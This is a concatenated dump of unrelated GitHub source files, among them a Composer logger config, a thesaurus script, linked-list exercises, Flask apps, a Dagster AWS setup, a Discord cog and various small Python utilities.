to `stdout`\", default=True)\n capture_stderr: bool = hp.optional(\"Whether to capture writes to `stderr`\", default=True)\n buffer_size: int = hp.optional(\"Number of bytes to buffer. Defaults to 1 for line-buffering. \"\n \"See https://docs.python.org/3/library/functions.html#open\",\n default=1) # line buffering. Python's default is -1.\n flush_interval: int = hp.optional(\n \"Frequency to flush the file, relative to the ``log_level``. \"\n \"Defaults to 100 of the unit of ``log_level``.\",\n default=100)\n log_interval: int = hp.optional(\n \"Frequency to record log messages, relative to the ``log_level``.\"\n \"Defaults to 1 (record all messages).\",\n default=1)\n\n def initialize_object(self) -> FileLogger:\n return FileLogger(**asdict(self))\n\n\n@dataclass\nclass WandBLoggerHparams(LoggerDestinationHparams):\n \"\"\":class:`~composer.loggers.wandb_logger.WandBLogger` hyperparameters.\n\n Args:\n project (str, optional): WandB project name.\n group (str, optional): WandB group name.\n name (str, optional): WandB run name.\n If not specified, the :attr:`.Logger.run_name` will be used.\n entity (str, optional): WandB entity name.\n tags (str, optional): WandB tags, comma-separated.\n config (Dict[str, Any], optional): WandB run configuration.\n flatten_config (bool, optional): Whether to flatten the run config. 
(default: ``False``)\n log_artifacts (bool, optional): See :class:`~composer.loggers.wandb_logger.WandBLogger`.\n rank_zero_only (bool, optional): See :class:`~composer.loggers.wandb_logger.WandBLogger`.\n extra_init_params (dict, optional): See\n :class:`~composer.loggers.wandb_logger.WandBLogger`.\n \"\"\"\n\n project: Optional[str] = hp.optional(doc=\"wandb project name\", default=None)\n group: Optional[str] = hp.optional(doc=\"wandb group name\", default=None)\n name: Optional[str] = hp.optional(doc=\"wandb run name\", default=None)\n entity: Optional[str] = hp.optional(doc=\"wandb entity\", default=None)\n tags: Optional[str] = hp.optional(doc=\"wandb tags comma separated\", default=None)\n log_artifacts: bool = hp.optional(doc=\"Whether to log artifacts\", default=False)\n rank_zero_only: bool = hp.optional(\"Whether to log on rank zero only\", default=True)\n extra_init_params: Dict[str, Any] = hp.optional(doc=\"wandb parameters\", default_factory=dict)\n config: Dict[str, Any] = hp.optional(doc=\"Wandb run configuration\", default_factory=dict)\n flatten_config: bool = hp.optional(\n doc=\"Whether to flatten the config, which can make nested fields easier to visualize and query.\", default=False)\n\n def initialize_object(self) -> WandBLogger:\n tags = None\n if self.tags is not None:\n tags = list(set([x.strip() for x in self.tags.split(\",\") if x.strip() != \"\"]))\n\n config_dict = self.config\n\n if \"config\" in self.extra_init_params:\n config_dict = self.extra_init_params[\"config\"]\n\n if self.flatten_config:\n config_dict = self._flatten_dict(config_dict, prefix=[])\n\n init_params = {\n \"project\": self.project,\n \"name\": self.name,\n \"group\": self.group,\n \"entity\": self.entity,\n \"tags\": tags,\n \"config\": config_dict,\n }\n init_params.update(self.extra_init_params)\n return WandBLogger(\n log_artifacts=self.log_artifacts,\n rank_zero_only=self.rank_zero_only,\n init_params=init_params,\n )\n\n @classmethod\n def _flatten_dict(cls, data: Dict[str, Any], prefix: List[str]) -> Dict[str, Any]:\n \"\"\"Flattens a dictionary with list or sub dicts to have dot syntax.\n\n .. testcode::\n\n >>> config = {\n ... \"sub_dict\":{\n ... \"sub_list\":[\n ... \"sub_sub_dict\":{\n ... \"foo\": 0,\n ... \"bar\": \"baz\"\n ... }\n ... ]\n ... },\n ... \"hello\": \"world\"\n ... }\n >>> _flatten_dict(config)\n {\n 'sub_dict.sub_list.sub_sub_dict.foo': 0,\n 'sub_dict.sub_list.sub_sub_dict.bar': 'baz',\n 'hello': 'world',\n }\n \"\"\"\n all_items = {}\n for key, val in data.items():\n key_items = list(prefix) + [key]\n key_name = \".\".join(key_items)\n if isinstance(val, dict):\n all_items.update(cls._flatten_dict(val, key_items))\n elif isinstance(val, list):\n found_sub_dicts = False\n for item in val:\n if isinstance(item, dict):\n found_sub_dicts = True\n for sub_key, sub_val in item.items():\n if isinstance(sub_val, dict):\n all_items.update(cls._flatten_dict(sub_val, key_items + [sub_key]))\n else:\n all_items.update({sub_key: sub_val})\n if not found_sub_dicts:\n all_items[key_name] = val\n else:\n all_items[key_name] = val\n return all_items\n\n\n@dataclass\nclass ProgressBarLoggerHparams(LoggerDestinationHparams):\n \"\"\":class:`~composer.loggers.progress_bar_logger.ProgressBarLogger`\n hyperparameters.\n\n .. deprecated:: 0.6.0\n\n This class is deprecated. Instead, please specify the :class:`.ProgressBarLogger` arguments\n directly in the :class:`~composer.trainer.trainer_hparams.TrainerHparams`. 
This class will be removed\n in v0.7.0.\n\n Args:\n progress_bar (bool, optional): See :class:`.ProgressBarLogger`.\n log_to_console (bool, optional): See :class:`.ProgressBarLogger`.\n console_log_level (bool, optional): See :class:`.ProgressBarLogger`.\n stream (bool, optional): See :class:`.ProgressBarLogger`.\n \"\"\"\n\n progress_bar: bool = hp.optional(\"Whether to show a progress bar.\", default=True)\n log_to_console: Optional[bool] = hp.optional(\"Whether to print log statements to the console.\", default=None)\n console_log_level: LogLevel = hp.optional(\"The maximum log level.\", default=LogLevel.EPOCH)\n stream: str = hp.optional(\"The stream at which to write the progress bar and log statements.\", default=\"stderr\")\n\n def initialize_object(self) -> ProgressBarLogger:\n return ProgressBarLogger(\n progress_bar=self.progress_bar,\n log_to_console=self.log_to_console,\n console_log_level=self.console_log_level,\n stream=self.stream,\n )\n\n\n@dataclass\nclass InMemoryLoggerHparams(LoggerDestinationHparams):\n \"\"\":class:`~composer.loggers.in_memory_logger.InMemoryLogger`\n hyperparameters.\n\n Args:\n log_level (str | LogLevel, optional):\n See :class:`~composer.loggers.in_memory_logger.InMemoryLogger`.\n \"\"\"\n log_level: LogLevel = hp.optional(\"The maximum verbosity to log. Default: BATCH\", default=LogLevel.BATCH)\n\n def initialize_object(self) -> LoggerDestination:\n return InMemoryLogger(log_level=self.log_level)\n\n\n@dataclass\nclass ObjectStoreLoggerHparams(LoggerDestinationHparams):\n \"\"\":class:`~composer.loggers.in_memory_logger.InMemoryLogger`\n hyperparameters.\n\n Args:\n object_store_hparams (ObjectStoreHparams): The object store provider hparams.\n should_log_artifact (str, optional): The path to a filter function which returns whether an artifact should be\n logged. The path should be of the format ``path.to.module:filter_function_name``.\n\n The function should take (:class:`~composer.core.state.State`, :class:`.LogLevel`, ````).\n The artifact name will be a string. The function should return a boolean indicating whether the artifact\n should be logged.\n\n .. 
seealso: :func:`composer.utils.import_helpers.import_object`\n\n Setting this parameter to ``None`` (the default) will log all artifacts.\n object_name (str, optional): See :class:`~composer.loggers.object_store_logger.ObjectStoreLogger`.\n config_artifact_name (str, optional): See :class:`~composer.loggers.object_store_logger.ObjectStoreLogger`.\n num_concurrent_uploads (int, optional): See :class:`~composer.loggers.object_store_logger.ObjectStoreLogger`.\n upload_staging_folder (str, optional): See :class:`~composer.loggers.object_store_logger.ObjectStoreLogger`.\n use_procs (bool, optional): See :class:`~composer.loggers.object_store_logger.ObjectStoreLogger`.\n \"\"\"\n object_store_hparams: ObjectStoreHparams = hp.required(\"Object store provider hparams.\")\n should_log_artifact: Optional[str] = hp.optional(\n \"Path to a filter function which returns whether an artifact should be logged.\", default=None)\n object_name: str = hp.optional(\"A format string for object names\", default=\"{artifact_name}\")\n config_artifact_name: Optional[str] = hp.optional(\n \"Format string to describe how to store the training configuration.\", default=\"{run_name}/config.yaml\")\n num_concurrent_uploads: int = hp.optional(\"Maximum number of concurrent uploads.\", default=4)\n use_procs: bool = hp.optional(\"Whether to perform file uploads in background processes (as opposed to threads).\",\n default=True)\n upload_staging_folder: Optional[str] = hp.optional(\n \"Staging folder for uploads. If not specified, will use a temporary directory.\", default=None)\n\n def initialize_object(self) -> ObjectStoreLogger:\n return ObjectStoreLogger(\n provider=self.object_store_hparams.provider,\n container=self.object_store_hparams.container,\n provider_kwargs=self.object_store_hparams.get_provider_kwargs(),\n object_name=self.object_name,\n should_log_artifact=import_object(self.should_log_artifact)\n if self.should_log_artifact is not None else None,\n num_concurrent_uploads=self.num_concurrent_uploads,\n upload_staging_folder=self.upload_staging_folder,\n use_procs=self.use_procs,\n )\n\n\nlogger_registry = {\n \"file\": FileLoggerHparams,\n \"wandb\": WandBLoggerHparams,\n \"progress_bar\": ProgressBarLoggerHparams,\n \"in_memory\": InMemoryLoggerHparams,\n \"object_store\": ObjectStoreLoggerHparams,\n}\n","repo_name":"BehradToghi/composer_benchmarker","sub_path":"composer/loggers/logger_hparams.py","file_name":"logger_hparams.py","file_ext":"py","file_size_in_byte":13296,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29210902269","text":"import json\nfrom difflib import get_close_matches\n\ndata = json.load(open('English Thesaurus/data.json'))\n\ndef translate(word):\n \n # Turn the inputted word into lowercase\n word = word.lower()\n\n # If the inputted word is in the dictionary then return the definition\n if word in data:\n return data[word][0]\n \n # If the word is not in the dictionary BUT has close matches, ask if they meant the MOST similar\n elif len(get_close_matches(word, data.keys())) > 0:\n did_you_mean = input(f'Did you mean {get_close_matches(word, data.keys())[0]}? 
(Y/N) ')\n\n        # If they meant the most similar and typed 'y', then return the meaning of that word\n        if did_you_mean.lower() == 'y':\n            return f'{get_close_matches(word, data.keys())[0].title()} : {data[get_close_matches(word, data.keys())[0]][0]}'\n\n        # If they didn't mean the most similar word then tell them the word is not in the dictionary\n        else:\n            return 'Sorry, word not in dictionary'\n    \n    # If the word has no similar matches and is not in the dictionary then tell them.\n    else:\n        return 'Word not in dictionary'\n\ninput_word = input('Enter a word: ')\n\nprint(translate(input_word))\n","repo_name":"0xhascoin/Python-Mega-Course","sub_path":"Application 1 English Thesaurus/thesaurus.py","file_name":"thesaurus.py","file_ext":"py","file_size_in_byte":1219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72328331367","text":"class Node: \n    def __init__(self, data, next_node=None, prev_node=None):\n        self.data = data\n        self.next_node = next_node\n        self.prev_node = prev_node\n\nclass LinkedList:\n    def __init__(self):\n        self.head = None\n\n    def insert_into_ll(self, data):\n        new_node = Node(data)\n        \n        if self.head:\n            active_node = self.head\n            while active_node.next_node:\n                active_node = active_node.next_node\n\n            active_node.next_node = new_node\n            new_node.prev_node = active_node\n        else:\n            self.head = new_node\n    \n    def print_ll(self):\n        cur_node = self.head\n        while cur_node:\n            print(cur_node.data)\n            cur_node = cur_node.next_node\n\n    def partition(self, p):\n        \"\"\" Prompt: Write code to partition a linked list around a value p\n        \n        Parameters: \n            p: integer\n                Partition value \n        Requirements:\n            All nodes less than partition value p come before all nodes greater\n            than or equal to partition value p\n        \"\"\"\n        cur_node = self.head\n        end_node = self.head\n\n        while end_node.next_node:\n            end_node = end_node.next_node\n        \n        end_ref = end_node\n        while end_node.prev_node: \n            while end_node.data < p:\n                active_node = end_node\n                next_node = end_node.next_node\n                prev_node = end_node.prev_node\n                if end_node.next_node:\n                    next_node.prev_node = prev_node\n                if end_node.prev_node:\n                    prev_node.next_node = next_node\n                active_node.next_node = cur_node.next_node\n                cur_node.next_node = active_node\n                end_node = prev_node\n            end_node = end_node.prev_node\n\n        while end_node.next_node:\n            end_node = end_node.next_node\n\n        active_node = self.head\n        if not active_node.data < p:\n            next_node = active_node.next_node\n            next_node.prev_node = None\n            active_node.next_node = None\n            end_node.next_node = active_node\n            active_node.prev_node = end_node\n            self.head = next_node\n    \n    def palindrome(self):\n        \"\"\"Prompt: Implement a function to check if a linked list is a palindrome\n\n        Returns boolean\n        \"\"\"\n        front_node = self.head\n        end_node = self.head\n        while end_node.next_node:\n            end_node = end_node.next_node\n\n        while not end_node == front_node:\n            if end_node.data == front_node.data:\n                if end_node.prev_node == front_node.next_node:\n                    return True\n                end_node = end_node.prev_node\n                front_node = front_node.next_node\n            else:\n                return False\n        # the pointers met in the middle, so the list reads the same both ways\n        return True\n\ndef manipulate_ll(vals, p=None, pal=False):\n    \"\"\" Function to manipulate linked list\n\n    Parameters:\n        vals: list of integers\n            build linked list out of these integers\n        p: Integer\n            if a p value is passed, it will run the partition function\n        pal: Boolean\n            If pal, test if Linked list is a palindrome\n    \"\"\"\n    LL = LinkedList()\n    for val in vals:\n        LL.insert_into_ll(val)\n\n    print(\"Linked List for reference:\")\n    LL.print_ll()\n\n    if 
p:\n LL.partition(p)\n print(\"partitioned:\")\n LL.print_ll()\n\n if pal:\n return LL.palindrome()\n\n","repo_name":"cseydlitz/practice","sub_path":"LinkedLists/double_linked_list_manipulation.py","file_name":"double_linked_list_manipulation.py","file_ext":"py","file_size_in_byte":3564,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12657992696","text":"a,b,w=map(int,input().split())\nw*=1000\nval=w//b\nval2=w//a+1\nmi=10**15\nmx=10**-15\nfor i in range(val,val2+1):\n if a<=w/i<=b:\n mi=min(mi,i)\n mx=max(mx,i)\nif mi==10**15 and mx==10**-15:\n print(\"UNSATISFIABLE\")\n exit()\nprint(mi,mx)\n","repo_name":"mono-0812/procon","sub_path":"atcoder.jp/abc195/abc195_b/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":251,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9593286406","text":"from flask import Flask, jsonify\n\nfrom config import FlaskConfig\nfrom proxy.ProxyManager import ProxyManager\n\napp = Flask(__name__)\npm = ProxyManager()\n\n\n@app.route(\"//get\")\ndef get(type):\n if type:\n proxy = pm.get(type)\n return proxy.decode(\"utf-8\") if proxy else \"no useful proxy\"\n\n\n@app.route(\"/info\")\ndef info():\n return jsonify(pm.info())\n\n\ndef run():\n host = FlaskConfig(\"host\")\n port = FlaskConfig(\"port\")\n app.run(host=host, port=port)\n\n\nif __name__ == '__main__':\n run()\n\n\n","repo_name":"zhumian/proxypool","sub_path":"api/ProxyApi.py","file_name":"ProxyApi.py","file_ext":"py","file_size_in_byte":520,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9912393146","text":"from typing import Optional\nfrom urllib.parse import quote\n\nfrom SmartDjango import E, Hc\n\nfrom Account.models import Account\nfrom Channel.channels.base import BaseChannel\nfrom utils.grabber import Grabber\n\nquote_safe = lambda x: quote(x, safe='')\n\n\n@E.register(id_processor=E.idp_cls_prefix())\nclass BarkError:\n REQUEST = E('Bark Request', hc=Hc.InternalServerError)\n\n\nclass Bark(BaseChannel):\n class Body:\n uri: str\n content: str\n title: Optional[str] = None\n sound: Optional[str] = None\n icon: Optional[str] = None\n group: Optional[str] = None\n url: Optional[str] = None\n\n worker = Grabber()\n active = True\n\n @classmethod\n def handler(cls, body: Body, account: Account):\n if not body.uri.endswith('/'):\n body.uri += '/'\n\n if not body.title:\n body.title = ''\n body.title = '【{}】{}'.format(account.nick, body.title)\n path = '%s%s/%s' % (body.uri, quote_safe(body.title), quote_safe(body.content))\n\n query = dict()\n params = ['sound', 'url', 'icon', 'group']\n for param in params:\n value = getattr(body, param)\n if value:\n query[param] = value\n\n try:\n cls.worker.get(path, query=query)\n except Exception as err:\n raise BarkError.REQUEST(debug_message=err)\n","repo_name":"Jyonn/NotificatorX","sub_path":"Channel/channels/bark.py","file_name":"bark.py","file_ext":"py","file_size_in_byte":1371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73677827048","text":"def perfometer_check_mk_xfs_quota(row, check_command, perf_data):\n # Uncomment and restart Apache to debug:\n #return repr(perf_data), ''\n # Data sample: \n # [\n # (u'b__/srv/xfstest__test1', u'2097152', u'', u'100', u'50', u'', u''),\n # (u'i__/srv/xfstest__test1', u'2', u'', u'0', u'0', u'', u'')\n # ]\n color_b = { 0: '#60E0A0', 1: '#FFFF00', 2: 
'#FF0000', 3: '#FFBF00' }[row[\"service_state\"]]\n color_i = { 0: '#60A0E0', 1: '#FFFF80', 2: '#FF0080', 3: '#FFBF80' }[row[\"service_state\"]]\n half_b = 100000000\n half_i = 1000000\n\n if (perf_data[0][0].startswith(\"b__\")):\n blocks = float(perf_data[0][1])\n elif (perf_data[1][0].startswith(\"b__\")):\n blocks = float(perf_data[1][1])\n if (perf_data[0][0].startswith(\"i__\")):\n inodes = float(perf_data[0][1])\n elif (perf_data[1][0].startswith(\"i__\")):\n inodes = float(perf_data[1][1])\n\n text = \"\"\n if (blocks >= 0):\n human_b = number_human_readable(blocks, 0, \"Blk\")\n text += \"%s\" % human_b\n if (inodes >= 0):\n human_i = number_human_readable(inodes, 0, \"Inode\")\n if (text):\n text += \" / \"\n text += \"%s\" % human_i\n return text, perfometer_logarithmic_dual_independent(\n blocks, color_b, half_b, 10, inodes, color_i, half_i, 10)\n\nperfometers[\"check_mk-xfs_quota\"] = perfometer_check_mk_xfs_quota\n\n#\n# EOF\n","repo_name":"frank-fegert/check_mk","sub_path":"xfs_quota/web/plugins/perfometer/xfs_quota.py","file_name":"xfs_quota.py","file_ext":"py","file_size_in_byte":1393,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"74656786727","text":"# encoding=utf-8\n\"\"\"\n@Time : 2020/4/4 13:18 \n@Author : LiuYanZhe\n@File : cleanData.py \n@Software: PyCharm\n@Description: 清洗数据\n\"\"\"\nimport pandas as pd\n\ndf1 = pd.read_csv('../data/China_history_2020_04_04.csv')\nprint(df1.columns)\nprint(df1.loc[:68, ['date', 'today_confirm', 'total_confirm', 'total_heal', 'total_dead']])\ndf2 = df1.loc[:68, ['date', 'today_confirm']]\ntemp_df = df1['total_confirm'] - df1['total_heal'] - df1['total_dead'] # 计算出的当日现存人数\ndf2['now'] = temp_df\ndead_rate = df1['total_dead'] / (df1['total_dead'] + df1['total_heal'])\ndf2['dead_rate'] = dead_rate\nheal_rate = df1['total_heal'] / (df1['total_dead'] + df1['total_heal'])\ndf2['heal_rate'] = heal_rate\nprint(df2)\ndf2.to_csv('../data/Chinahistory_today_now_20200328.csv')\n# print(type(df2))\n","repo_name":"lyz21/MachineLearning","sub_path":"Convid19/ChinaPlot/cleanData.py","file_name":"cleanData.py","file_ext":"py","file_size_in_byte":789,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37009475929","text":"import psycopg2\nimport sys\nimport os\nimport csv\n\ntry:\n conn = psycopg2.connect(dbname=\"snakesdb\", user=\"fox\", password=\"senha\")\nexcept:\n print(\"Error: It was not possible to connect to the database\")\n sys.exit(1)\n\ncur = conn.cursor()\n\nfilename = \"../../data/N-glycans_table.csv\"\nwith open(filename, 'r') as csvfile:\n reader = csv.DictReader(csvfile, delimiter=';')\n fieldnames = reader.fieldnames\n for row in reader:\n gl_id = row[fieldnames[0]]\n try:\n cur.execute(\"INSERT INTO glycans(gl_id) VALUES ('{0}');\".format(gl_id))\n except psycopg2.ProgrammingError as e:\n print(\"Insert error\")\n print(e)\n conn.rollback()\n print(\"Rollback complete\")\n\n conn.commit()\n\n for sp in fieldnames[2:]:\n if row[sp] == '0':\n continue\n species = sp.split()[1]\n try:\n cur.execute(\"INSERT INTO gl_sn(gl_id, sn_sp) VALUES ('{0}', '{1}');\"\\\n .format(gl_id, species))\n except psycopg2.ProgrammingError as e:\n print(\"Insert error\")\n print(e)\n conn.rollback()\n print(\"Rollback complete\")\n\n conn.commit()\n\ncur.close()\nconn.close()\n\n 
\n\n","repo_name":"vwraposo/TCC","sub_path":"src/db/insert_glycan_data.py","file_name":"insert_glycan_data.py","file_ext":"py","file_size_in_byte":1392,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"15254224631","text":"from flask import Flask, render_template, redirect\nfrom flask_pymongo import PyMongo\nimport scrape_mars\n\n# Create an instance of Flask\napp = Flask(__name__)\n\n# Use PyMongo to establish Mongo connection to mars_db database\nmongo = PyMongo(app, uri=\"mongodb://localhost:27017/mars_db\")\n\n@app.route(\"/\")\ndef index():\n print(\"Querying the data\")\n marsdata = mongo.db.marsdata.find_one()\n print(\"Started rendering the page...\")\n # print(marsdata.html_table)\n return render_template(\"index.html\", listings=marsdata)\n\n@app.route(\"/scrape\")\ndef scraper():\n \n # remove previous documents before insert\n mongo.db.marsdata.delete_many({})\n\n # Run the scrape function\n mars_data = scrape_mars.scrape()\n print(\"Completed scraping and before insert to database\")\n \n # Insert the document into the database\n mongo.db.marsdata.insert_one(mars_data)\n \n print(\"Return back to home page\")\n # Redirect back to home page\n return redirect(\"/\", code=302)\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n","repo_name":"raviselva4/web-scraping-challenge","sub_path":"Mission_to_Mars/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1039,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9881554877","text":"from dagster import (\n Definitions,\n EnvVar,\n ScheduleDefinition,\n define_asset_job,\n load_assets_from_package_module,\n)\nfrom dagster_aws.s3 import S3PickleIOManager, S3Resource\n\nfrom . import assets\n\ndaily_refresh_schedule = ScheduleDefinition(\n job=define_asset_job(name=\"all_assets_job\"), cron_schedule=\"0 0 * * *\"\n)\n\nmy_s3_resource = S3Resource()\n\ndefs = Definitions(\n assets=load_assets_from_package_module(assets),\n # The AWS resources use boto under the hood, so if you are accessing your private\n # buckets, you will need to provide the AWS_ACCESS_KEY_ID and AWS_SECRET_ACCESS_KEY\n # environment variables or follow one of the other boto authentication methods.\n # Read about using environment variables and secrets in Dagster:\n # https://docs.dagster.io/guides/dagster/using-environment-variables-and-secrets\n resources={\n # With this I/O manager in place, your job runs will store data passed between assets\n # on S3 in the location s3:///dagster/storage/.\n \"io_manager\": S3PickleIOManager(\n s3_resource=my_s3_resource,\n s3_bucket=EnvVar(\"S3_BUCKET\"),\n ),\n \"s3\": my_s3_resource,\n },\n schedules=[daily_refresh_schedule],\n)\n","repo_name":"dagster-io/dagster","sub_path":"examples/quickstart_aws/quickstart_aws/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1255,"program_lang":"python","lang":"en","doc_type":"code","stars":8986,"dataset":"github-code","pt":"53"} +{"seq_id":"2301065045","text":"import pandas as pd\nimport ast\nimport json\n\n# def compare_dataframes_by_column(\n# df1,\n# df2,\n# comparison_column\n# ):\n# return\n#\n# def get_data_frame_comparison(\n# df1,\n# df2,\n# comparison_column\n# ):\n# result = {\n# \"no_of_duplicate_records_by_code\": None,\n# \"index_of_new_record\":\n# }\n#\n# return\n\n\n# How many new restaurant codes?\n\n# How many known restaurants have changed values?\n\n# Has Restaurant moved? 
(geo coordinate comparison)\n\n# Has Budget Changed?\n\n# Has Cuisine changed?\n\n# Create\n\n\nif __name__ == \"__main__\":\n\n    file_name = \"../CW1/final_data.csv\"\n\n    data_frame = pd.read_csv(file_name)\n\n    data_frame_sub = data_frame.iloc[:10]\n    #print(data_frame_sub)\n\n    set_cusine_id = set()\n\n    cusine_col = \"characteristics.cuisines\"\n\n    cusines = []\n\n    for index, row in data_frame.iterrows():\n        characteristics_cusine = ast.literal_eval(row[cusine_col])\n        for dictionary in characteristics_cusine:\n            if dictionary[\"id\"] not in set_cusine_id:\n                cusines.append(dictionary)\n                set_cusine_id.add(dictionary[\"id\"])\n\n\n\n    \n    cusine_dataframe = pd.DataFrame(cusines)\n\n\n    print(cusine_dataframe)\n","repo_name":"jangomango87/CW1_Final","sub_path":"CW2/compare_data.py","file_name":"compare_data.py","file_ext":"py","file_size_in_byte":1210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73813642087","text":"from discord.ext import commands\n\nimport discord\n\n\n\nclass sinfull(commands.Cog):\n\n\n    def __init__(self, client):\n        self.client = client\n\n    # Example how to make custom commands: \n    @commands.command()\n    async def lolol(self, ctx):\n        await ctx.send(\"hey fag\")\n\n\n\ndef setup(client):\n    client.add_cog(sinfull(client))\n","repo_name":"9s6/sinfull-selfbot","sub_path":"custom-commands/custom-commands.py","file_name":"custom-commands.py","file_ext":"py","file_size_in_byte":337,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74536194407","text":"#!/usr/bin/python3\n\ndef search_replace(my_list, search, replace):\n    jidecopy = []\n    for i in range(len(my_list)):\n        if my_list[i] == search:\n            jidecopy.append(replace)\n        else:\n            jidecopy.append(my_list[i])\n    return jidecopy\n","repo_name":"babajideawoseemo/alx-higher_level_programming","sub_path":"0x04-python-more_data_structures/1-search_replace.py","file_name":"1-search_replace.py","file_ext":"py","file_size_in_byte":262,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2565830875","text":"\"\"\"\n@deprecated, see pip install funcoperators\n\"\"\"\n\nimport itertools\n\n# http://stackoverflow.com/questions/11173660/can-one-partially-apply-the-second-argument-of-a-function-that-takes-no-keyword\ndef _partial(func, *args, **keywords):\n    def newfunc(*fargs, **fkeywords):\n        newkeywords = keywords.copy()\n        newkeywords.update(fkeywords)\n        return func(*(newfunc.leftmost_args + fargs + newfunc.rightmost_args), **newkeywords)\n    \n    newfunc.func = func\n    args = iter(args)\n    newfunc.leftmost_args = tuple(itertools.takewhile(lambda v: v != Ellipsis, args))\n    newfunc.rightmost_args = tuple(args)\n    newfunc.keywords = keywords\n    return newfunc\n\nclass partial: \n    def __init__(self, f, *args, **kwargs):\n        if args or kwargs:\n            self.func = _partial(f, *args, **kwargs) if args or kwargs else f\n            \n            self.leftmost_args = self.func.leftmost_args\n            self.rightmost_args = self.func.rightmost_args\n            self.keywords = self.func.keywords\n        \n        else:\n            self.func = f\n            self.leftmost_args = ()\n            self.rightmost_args = ()\n            self.keywords = kwargs\n    \n    def bind(self, *args, **kwargs):\n        return partial(self.func, *args, **kwargs)\n    \n    def __getitem__(self, args):\n        return self.bind(*args) if isinstance(args, tuple) else self.__getitem__((args,))\n    \n    def __call__(self, *args, **kwargs):\n        return self.func(*args, **kwargs)\n    \n    def __str__(self):\n        return \"PartialObject<func={}, left={}, right={}, keywords={}>\".format(self.func, 
self.leftmost_args, self.rightmost_args, self.keywords)\n \n @staticmethod\n def fix(*args, **kwargs):\n return partial(partial, ..., *args, **kwargs)\n \nclass auto_partial(partial):\n def __call__(self, *args, **kwargs):\n try:\n return self.func(*args, **kwargs)\n except TypeError:\n return self.bind(*args, **kwargs)\n \n @staticmethod\n def fix(*args, **kwargs):\n return partial(auto_partial, ..., *args, **kwargs)\n\nif __name__ == '__main__':\n # Normal function\n f0 = partial(pow)\n \n print(f0(2,3))\n \n # Operator [] or .bind to apply positional arguments partiallity\n # Or constructor\n f1 = partial(pow)[2]\n f1 = partial(pow).bind(2)\n f1 = partial(pow, 2)\n \n print(f1(3))\n \n # auto_partial \"guess\" within a call if is it a final call or some arguments are missing\n f2 = auto_partial(pow)(2)\n f2 = auto_partial(pow, 2)\n \n print(f2(3))\n \n # Ellipsis can be used as position place holder\n f3 = partial(pow)[..., 3]\n f3 = partial(pow, ..., 3)\n \n print( f3(2) )\n \n # Multiple arguments are easy\n f4 = partial(print)[\"Hello\", ..., 5]\n f4 = partial(print, \"Hello\", ..., 5)\n \n f4(\"Bob\")\n \n # For keywords arguments, constructor or .bind is required\n f5 = partial(print, \"Hello\", ..., 5, sep=' ++ ')\n f5 = partial(print, \"Hello\", ..., 5).bind(sep=' ++ ')\n f5 = partial(print).bind(\"Hello\", ..., 5, sep=' ++ ')\n \n f5(\"Bob\")\n \n # Can be used as a decorator to enhance simple functions\n @partial\n def f(x,y):\n print(\"{} + {} = {}\".format(x, y, x + y))\n \n f[1](2)\n \n # .fix can fix an argument, here y will always be 5. But this is confusing\n \n @partial.fix(..., 5)\n def f(x,y,z):\n print(\"x\", x, \"y\", y, \"z\", z)\n \n \n f[1](2)\n","repo_name":"robertvandeneynde/python","sub_path":"deprecated/myfunctool.py","file_name":"myfunctool.py","file_ext":"py","file_size_in_byte":3516,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"53"} +{"seq_id":"7739949086","text":"from django.conf.urls import url\n\nfrom . 
import views\n\napp_name = 'survey'\nurlpatterns = [\n url(r'^$', views.index, name='index'),\n url(r'^logout/$', views.logout_view, name='logout'),\n url(r'^my-surveys/$', views.mysurveys_view, name='my_surveys'),\n url(r'^survey-create/(?P[0-9]+)$', views.createSurvey, name='survey_create'),\n url(r'^survey-create/$', views.createSurvey, name='survey_create'),\n url(r'^survey-edit/(?P[0-9]+)$', views.editSurvey, name='survey_edit'),\n url(r'^survey-fill/(?P[0-9]+)$', views.fillSurvey, name='survey_fill'),\n url(r'^survey-results/(?P[0-9]+)$', views.resultsSurvey, name='survey_results'),\n url(r'^survey-data/$', views.dataSurvey, name='survey_data'),\n url(r'^survey-delete/$', views.deleteSurvey, name='survey_delete'),\n]\n","repo_name":"z3t0/survey-server","sub_path":"survey/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11763984640","text":"import os\r\nimport random\r\nimport shutil\r\n\r\nlabel_conversion = {'01': 'neutral',\r\n '03': 'happy',\r\n '04': 'sad',\r\n '05': 'angry',\r\n '06': 'fear',\r\n '07': 'disgust',\r\n '08': 'ps'}\r\n \r\n#the path for dataset in my dir\r\n\r\nos.chdir('C:\\\\Users\\\\Hrishikesh\\\\Desktop\\\\Project\\\\#Project\\\\dataset')\r\ntess = os.walk('C:\\\\Users\\\\Hrishikesh\\\\Desktop\\\\Project\\\\#Project\\\\dataset')\r\n\r\n\r\n# Looping through the files to change their name\r\n\r\nfor files in tess: \r\n for filename in files[2]:\r\n if filename.startswith('OAF'):\r\n # Separate base from extension\r\n base, extension = 